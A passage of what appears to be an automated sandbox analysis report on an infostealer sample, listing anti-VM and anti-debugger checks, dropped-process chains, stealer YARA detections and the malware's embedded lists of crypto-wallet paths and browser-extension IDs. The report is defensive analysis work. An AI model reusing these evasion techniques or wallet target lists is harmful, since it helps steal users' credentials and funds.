Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: a37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Code function: 5_2_04BB0681 rdtsc 5_2_04BB0681
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C525FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C525FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C52C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C52C410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_007F643B mov eax, dword ptr fs:[00000030h] 8_2_007F643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_007FA1A2 mov eax, dword ptr fs:[00000030h] 8_2_007FA1A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C4FB66C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C4FB1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\ECGHCBGCBF.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe "C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe" Jump to behavior
Source: BGIIDAEBGC.exe, 00000005.00000002.1905859514.0000000000698000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: 6Program Manager
Source: BGIIDAEBGC.exe Binary or memory string: 6Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4FB341 cpuid 0_2_6C4FB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4C35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C4C35A0
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771FA0 GetUserNameA, 11_2_7F771FA0
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 16.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.BGIIDAEBGC.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2741394085.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4133532873.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.3899911028.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.3299622243.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3339913587.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3940474220.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1905744042.00000000004B1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1865490061.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2140215620.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1899129257.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2700865655.0000000005270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2099937610.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 11.2.a37ec701f3.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a37ec701f3.exe PID: 7344, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 11.2.a37ec701f3.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron 